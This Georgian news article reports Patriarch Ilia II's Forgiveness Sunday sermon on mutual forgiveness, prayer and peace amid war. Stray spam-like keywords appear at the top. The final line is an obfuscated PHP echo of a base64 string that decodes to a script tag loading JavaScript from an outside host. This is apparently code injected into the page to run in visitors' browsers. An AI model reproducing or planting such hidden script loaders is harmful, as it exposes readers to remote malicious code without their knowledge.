celsiusi
ავერსი შნაიდერი
სრულიად საქართველოს კათოლიკოს-პატრიარქმა, უწმინდესმა და უნეტარესმა, ილია მეორემ მღვდელმთავრებთან და სამღვდელოებასთან ერთად, სამების საკათედრო ტაძარში, შენდობის წესი აღასრულა.
 
პატრიარქმა მრევლს შენდობა სთხოვა და აღნიშნა, რომ ყველაფერი უნდა გავაკეთოთ, იმისათვის რომ ცოდვა შეუნდობელი არ დარჩეს.
 
"სახელისა მამისათა და ძისათა და წმინდისა სულისათა, ჩვენთან არს ღმერთი.
 
ყველაფერი იცვლება ამ ქვეყანაზე, ზოგი უკეთესობისაკენ ზოგი უმცირესობისაკენ და ჩვენ უყურებთ ამას და გვიკვირს, როდის დამთავრდება ეს ცვლილებები, მაგრამ ჩვენ უნდა გვახსოვდეს, რომ ეს ყველაფერი დამთავრდება. მეორედ მოსვლა უფლისა იხილება. ჩვენ უნდა გვახსოვდეს, რომ ყველაფერი დამოკიდებულია ღვთის ნებაზე, ღვთის განგებაზე. დიდება შენდა უფალო, მადლობა შენდა, განგება ღვთისა განუზომელია, განგება ღვთისა მიუწვდომელია.
 
აი, ომია ზოგიერთ ქვეყანაში. ჩვენ ვწუხვართ, რომ ეს ომი არის. ჩვენ ვლოცულობთ, ჩვენ ვცდილობთ, არ მივიღოთ მონაწილეობა. ჩვენმა ხალხმა შეაგროვა სურსათი, ჩასაცმელი ხალხის დასახმარებლად, მაგრამ ეს ცოტა არის, ჩვენ კიდევ ვეცდებით. ჩვენ ვწუხვართ შექმნილი სიტუაციისათვის, მაგრამ ჩვენ ყველაფერი უნდა გავაკეთოთ იმისთვის რომ შეწყდეს სისხლის ღვრა, შეწყდეს ომი და ხალხმა მოიპოვოს მშვიდობიანი ცხოვრება. ჩვენ ყველაფერი უნდა გავაკეთოთ იმისათვის, რომ მშვიდობა სუფევდეს. ვადიდოთ ღმერთი, ვთხოვოთ უფალს მშვიდობა და კაცთა შორის სათნოება.
 
რა უნდა ვაკეთოთ ჩვენ? რა უნდა მოვიმოქმედოთ? ჩვენ ყველაფერი უნდა გავაკეთოთ, იმისათვის, რომ მშვიდობამ დაისადგუროს, ამიტომ საჭიროა ჩვენი რწმენა, ჩვენი ლოცვა, საჭიროა სათნოება ადამიანთა შორის.
 
დიდება უფალს და მადლობა უფალს მისი წყალობისათვის.
 
დღევანდელ დღეს ეწოდება შენდობის კვირიაკე. ჩვენ შევუნდობთ ერთმანეთს ცოდვებს, შეცოდებას, ჩვენ ვაპატიებთ ერთმანეთს. ყველაფერი უნდა გავაკეთოთ იმისათვის, რომ ცოდვა არ დარჩეს შეუნდობელი. დიდება უფალს და მადლობა უფალს მისი დიდი წყალობისათვის. დიდება უფალს მისი მოთმინებისათვის. ყოველდღე ჩვენ რამდენჯერმე ვლოცულობთ „მამაო ჩვენოს“ – „და მომიტევეთ ჩვენ თანანადებნი ჩვენი, ვითარცა ჩვენ მოუტევებთ თანამდებთა მათ ჩვენთა“. ეს ლოცვა ძალიან მნიშვნელოვანია, ეს ლოცვა უფალმა გვასწავლა. თანანადები ჩვენი - ეს არის ვალი ჩვენი და მოგიტევებთ ჩვენ ვალი შენი, როგორც ჩვენ მივუტევებთ მოყვარესა ჩვენსა.
 
არ შეიძლება ადამიანი ცხონდეს, იცოცხლოს დედამიწაზე და ცოდვა არ ჩაიდინოს, ცოდვა იღებს ადამიანი და ეს გარდაუვალია ადამიანის ცხოვრებაში. რა უნდა ვაკეთოთ იმისათვის, რომ უფალმა შეგვინდოს შეცოდებანი ჩვენი? უპირველეს ყოვლისა საჭიროა რწმენა, საჭიროა სათნოება, საჭიროა განცდაი ცოდვასა და არა განკითხვა ძმისა ჩვენისა. ეს აუცილებელია. ჩვენ ვცდილობთ სიკეთე ვაკეთოთ, ჩვენ ყველაფერს ვაკეთებთ იმისათვის, რომ სიკეთე გავუკეთოთ სხვა ადამიანს.
 
სამწუხაროდ, არის შემთხვევები, როცა ჩვენ ვაკეთებთ სიკეთეს და პასუხობენ ცუდი საქმეებით, ბოროტებით. ეს იმას არ ნიშნავს, რომ ჩვენ სამაგიერო უნდა გადავუხადოთ. სამაგიეროს გადახდა აძლიერებს ბოროტებას, ბოროტება ორმაგდება. დღეს არის შენდობის დღე და შენდობა აუცილებელია ერთმანეთისთვის.
 
დიდება უფალს და მადლობა უფალს, ჩვენ დღევანდელი დღე უნდა გამოვიყენოთ იმისათვის, რომ შენდობა მივიღოთ მოყვასისა ჩვენისა და უპირველეს ყოვლისა მე მინდა გთხოვოთ შენდობა. ცოდვა გარდაუვალია, ღმერთმა შეგინდოთ, ღმერთმა გაპატიოთ, ღმერთმა ინებოს წყალობა. ამ დღეს მე მოგმართავთ ყველას, შემინდეთ, მაპატიეთ შეცოდებანი ჩემი. ღმერთმა შეგინდოთ თქვენ სრულიად საქართველოს შეცოდებანი თქვენი ნებსით და უნებლიეთ, შენდობილი იყავით. ღმერთმა მოიღოს მადლი, მადლი ღვთისა", - განაცხადა პატრიარქმა ქადაგებისას. 
 
 
794
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");